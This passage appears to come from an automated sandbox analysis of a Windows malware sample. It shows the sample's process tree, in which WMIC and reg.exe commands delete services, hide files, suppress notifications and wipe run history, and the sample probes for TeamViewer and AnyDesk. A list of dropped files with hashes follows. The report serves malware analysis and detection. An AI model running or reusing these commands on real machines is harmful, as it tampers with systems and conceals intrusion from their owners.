                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                          C:\Windows\System32\wbem\WMIC.exe Service Where "name like 'App System'" Call Delete
                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                            PID:1600
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                            C:\Windows\System32\wbem\WMIC.exe service where "name like 'ServiceNetwork'" call stopservice
                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                              PID:844
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                              C:\Windows\System32\wbem\WMIC.exe service where "name like 'Service Network'" call stopservice
                                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                                PID:1160
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                C:\Windows\System32\wbem\WMIC.exe Service Where "name like 'ServiceNetwork'" Call Delete
                                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                                  PID:572
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\System32\wbem\WMIC.exe Service Where "name like 'Service Network'" Call Delete
                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                    PID:3008
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\System32\wbem\WMIC.exe service where "name like 'loadhost'" call stopservice
                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                      PID:1996
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\System32\wbem\WMIC.exe service where "name like 'loadhost Service'" call stopservice
                                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                                        PID:1948
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                        C:\Windows\System32\wbem\WMIC.exe Service Where "name like 'loadhost'" Call Delete
                                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                        PID:2340
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                        C:\Windows\System32\wbem\WMIC.exe Service Where "name like 'loadhost Service'" Call Delete
                                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                                          PID:2136
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                          C:\Windows\System32\wbem\WMIC.exe service where "name like 'loadhostDhcp'" call stopservice
                                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                                            PID:2360
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                            C:\Windows\System32\wbem\WMIC.exe service where "name like 'loadhost Dhcp'" call stopservice
                                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                                              PID:3044
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\System32\wbem\WMIC.exe Service Where "name like 'loadhostDhcp'" Call Delete
                                                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                                                PID:1964
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                C:\Windows\System32\wbem\WMIC.exe Service Where "name like 'loadhost Dhcp'" Call Delete
                                                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                                                  PID:1756
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\wbem\WMIC.exe Service Where "name like 'System'" Call Delete
                                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                                    PID:2088
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                    C:\Windows\System32\attrib.exe -h -r -s "C:\Windows\SysWOW64\sv.ini"
                                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                                    • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                    PID:1956
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                    C:\Windows\System32\attrib.exe -h -r -s "C:\Windows\SysWOW64\Unicod.cmd"
                                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                                    • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                    PID:1568
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                    C:\Windows\System32\reg.exe delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v TeamViewer /f
                                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                                      PID:2776
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\System32\reg.exe delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" /v TeamViewer /f
                                                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                      PID:2704
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\System32\reg.exe delete "HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /f
                                                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                                                        PID:716
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                                                          PID:2544
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                          C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Hidden" /t REG_DWORD /d "0x0" /f /reg:64
                                                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                                                            PID:1872
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Hidden" /t REG_DWORD /d "0x0" /f
                                                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                                                              PID:3068
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\PushNotifications" /v "ToastEnabled" /t REG_DWORD /d "0" /f /reg:64
                                                                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                                                                PID:2184
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\PushNotifications" /v "ToastEnabled" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                                                                  PID:1868
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\reg.exe add "HKCU\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v DisableNotificationCenter /t REG_DWORD /d "1" /f /reg:64
                                                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                                                    PID:2908
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                    C:\Windows\System32\reg.exe add "HKCU\SYSTEM\CurrentControlSet\Control\Windows" /v NoInteractiveServices /t REG_DWORD /d "1" /f
                                                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                                                      PID:3064
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                      C:\Windows\System32\reg.exe add "HKCU\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v DisableNotificationCenter /t REG_DWORD /d "1" /f
                                                                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                                                                        PID:344
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\Windows Error Reporting" /v "DontShowUI" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                        PID:1920
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /va /f
                                                                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                                                                          PID:2460
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                          C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /v a /t REG_SZ /d cmd\1 /f
                                                                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                                                                            PID:2380
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                            C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /v MRUList /t REG_SZ /d a /f
                                                                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                                                                              PID:2924
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\ping.exe 192.168.1.1 -n 2
                                                                                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                              • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                              PID:524
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\ping.exe 192.168.1.1 -n 2
                                                                                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                              • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                              PID:2148
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\ping.exe 192.168.1.1 -n 2
                                                                                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                              • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                              PID:2604
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\ping.exe 192.168.1.1 -n 2
                                                                                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                              • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                              PID:888
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\ping.exe 192.168.1.1 -n 2
                                                                                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                              • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                              PID:1712
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\tasklist.exe"
                                                                                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                                                                              • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                              PID:3008
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\findstr.exe /i /c:"IntelSvc" /c:"tv_x86" /c:"fontdrvhots"
                                                                                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                              PID:1300
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\tasklist.exe /FI "IMAGENAME eq TeamViewer.exe"
                                                                                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                                                                              • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                              PID:2224
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\findstr.exe /i /c:"TeamViewer"
                                                                                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                                                                                PID:1948
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                                C:\Windows\System32\ping.exe 192.168.1.1 -n 2
                                                                                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                PID:2084
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c C:\Windows\System32\findstr.exe /i /c:"IdGetter id:" /c:"] id: " "C:\ProgramData\USOShared\web.ttf"
                                                                                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                                                                                  PID:1612
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                                                                                    C:\Windows\System32\findstr.exe /i /c:"IdGetter id:" /c:"] id: " "C:\ProgramData\USOShared\web.ttf"
                                                                                                                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                                                                                                                      PID:2336
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                    C:\Windows\System32\reg.exe query "HKLM\Software\Wow6432Node\TeamViewer" /v "ClientID"
                                                                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                                                                      PID:2568
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                      C:\Windows\System32\reg.exe query "HKLM\Software\TeamViewer" /v "ClientID"
                                                                                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                                                                                        PID:2428
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\tasklist.exe /FI "IMAGENAME eq AnyDesk.exe"
                                                                                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                                                                                        • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                                                                                        PID:3044
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\findstr.exe /i /c:"AnyDesk"
                                                                                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                                                                                          PID:2208
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                                          C:\Windows\System32\ping.exe 192.168.1.1 -n 2
                                                                                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                          • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                          PID:1060
                                                                                                                                                                                                                                                                                                                                          • C:\ProgramData\IntelSvc.exe
                                                                                                                                                                                                                                                                                                                                            "C:\ProgramData\IntelSvc.exe" w -install_service -install_service
                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                            PID:2772
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\wbem\WmiApSrv.exe
                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\wbem\WmiApSrv.exe
                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                              PID:532

                                                                                                                                                                                                                                                                                                                                            Network

                                                                                                                                                                                                                                                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                                                                            Replay Monitor

                                                                                                                                                                                                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                            Downloads

                                                                                                                                                                                                                                                                                                                                            • C:\ProgramData\USOShared\web.ttf

                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                              929B

                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                              1c07626f968f16beb4925a8798ecb71b

                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                              e43d24951832a8968758773f35a2b738eba13fe3

                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                              44ace0ae623a9501980e5071321f3742ed451d134ca65f79df1eca500e9a3b04

                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                              234546138b47603c199a647c755567688f66e6278e155228aab9fa1158f9cac377520df903f5ced0c8125767372b61526247c0a290d09cbc91873afdc0304df9

                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\AnyDesk.txt

                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                              5.1MB

                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                              e6f473bd5340405656209e620f43068f

                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                              c144446dc23c86c7c9b26ce87c3176866372f6d1

                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                              bed33c3732307e19e9a702e7ff179180a7891b92cb879a5b758021eefc68a99b

                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                              2e9065caeadcef0edd1e8e8fe3139e0fc5a9dd46011dbc0a4666745ed817cfaf6f859c9f1b5c1e5e957476cb16b42dcf14508594e44f2a059706865c19866a4c

                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IntelSvc.txt

                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                              2.6MB

                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                              b421f64f1b1fd85f4f7e1aa9597843c7

                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                              cd7f089e47be78459f062468ebb22b4ded63b14a

                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                              7e8c114ef41fe925f5c5dafc1e58eee25fef47d113fb5a08ae65b2c4418a52bb

                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                              130272e33d1c43bb3053390a7e12322ea49faacce883ad1acd577c47469a198f8283ec9fe4b343e467d4d0db883fdbeda06a50556bd951c3bc35505fdc8f73e4

                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\NhStart3.cmd

                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                              169KB

                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                              78b0ae1d5248b76f3d6d863d3a41e39a

                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                              5b7888002a0361fdece7ebc41cad438173bec038

                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                              285522976ffe317c4de1344ae97c69bd2105ecb5e0cd20597d4f1125f82f2644

                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                              5313138b095aabcbf44775d949c0b9e9cd29aeaa08de3441bf4221bbe7ff4480231ff85103c28a2bf27b6121ccb0eb4e2ed4153e0560b179fedaa712468ee87e

                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Pst.txt

                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                              36B

                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                              1c2349d78149035ec324ef221af89a7f

                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                              7a5fe3bccf80995db71879d39cebbb30e4758417

                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                              ad9e97b9f2190ba89ce6f4cc70f1c7b4a45d2603dac2c2cd81d0b30dac2c456f

                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                              aadc21c0a490f21d1fbc61c7bc1ec5b58671590e8377bbdf69f94d2b2157c4ef3dbdc84ce31cf82cc74e87ca5b8b44a40699248e118895c042c2a324dd9393c1

                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RtkAudio.txt

                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                              6.2MB

                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                              4ee807c47f20d7f7506bbd62b61dc7af

                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                              36154cab3b7f7c38b1b03e47b301f17dbbd6fc6e

                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                              2461dfdb152d7a244939a024d647758e15ea4832c9b3e1322a697ec49b8bfbb9

                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                              e33e68f58f49719c18f9f67640daff10e9ccfcfd8751e2262baa02c514fa4c21b041d4fee968edeea51f9ffcab436c205c88c418a4b18533922780152e80e123

                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.txt

                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                              383KB

                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                              ac27de51896a5ba2fd0dda9b7955a201

                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                              864a95def336b50c70300ff6a7c553f0095a535a

                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                              35d3f6c87cc33f2fda5b594a6990d8d14e085e313564127a9c0606cedb398f93

                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                              cd25f4bdc8e6dd845f5c836f50259e2e2c291d99b37071f30007fa13edeb2d8c82880bf9eefdb363309c9128f78c7e451954b98abefa039ea12e33548771d625

                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Start.cmd

                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                              175KB

                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                              0847683acef3697e969a804da2a70b63

                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                              7a8d76fa8d0e4ccf932db28f1202187cbfd47029

                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                              b510741faba0f8a7f5f732e783bd8beb80547222eaa8615209c1e12fb4032d86

                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                              30b79642b5ea1d3cab8821db08db8e1c7524444eba4eb10a10e5ac5cfb5a5dee6b0c800052b609a02903f9e84c5d10045ee83bc2f6430c6f15960a5b6aaea20f

                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Start2.cmd

                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                              172KB

                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                              10a360219906aefaeab376bea16752f6

                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                              ad06ad2526291b6064cc4ac8d5fd8460a58ff2fe

                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                              550c586a6cd57e23902d48001477a31ceb5724c74c749c6d236b51d67c676ca4

                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                              7bd4f4a4559e04406e8519a685d21bab9c83244899beff2495a75d4e42bcfcd2fad76c20650293d48168391150277882efe3ae8c51cc8483f2424ffeea3957c3

                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Systemfont.txt

                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                              1.0MB

                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                              3c47d45f09948b8e6fdb5f96523bc60b

                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                              a890eaae8d5a45d54e7571c4bf780a6eb263586a

                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                              86bb64d0a8d548445e17d4edef0a0e5f97d019f3af524fc9cd625294916c973d

                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                              6b67bb4268595480261ff007058f59aa4505204278b3b094551f14132e9faf7160019b155831d9ab75d5cab64c1ac9ad1ceb4a7b6fb5ced87e144e475a74790c

                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Test1.txt

                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                              7B

                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                              6d390f918934c2142addb44c52cbc691

                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                              e66d6dc343ae53c9e2882487f4105eb08ab5c740

                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                              98d76dd27328cfafd87a64c1da3f01ca0d6bd9470d394fd920b63ae1d02fb535

                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                              c62367444708fa6c18a00c841b729f6a96f6de94fc927b6295257d131f7030a31a076966e50f8fdf21a484ff00bc3d93c0f85b02dae104de2074bb77076cf9a6

                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\WinRing0x64.txt

                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                              14KB

                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                              0c0195c48b6b8582fa6f6373032118da

                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                              d25340ae8e92a6d29f599fef426a2bc1b5217299

                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                              11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

                                                                                                                                                                                                                                                                                                                                              SHA512

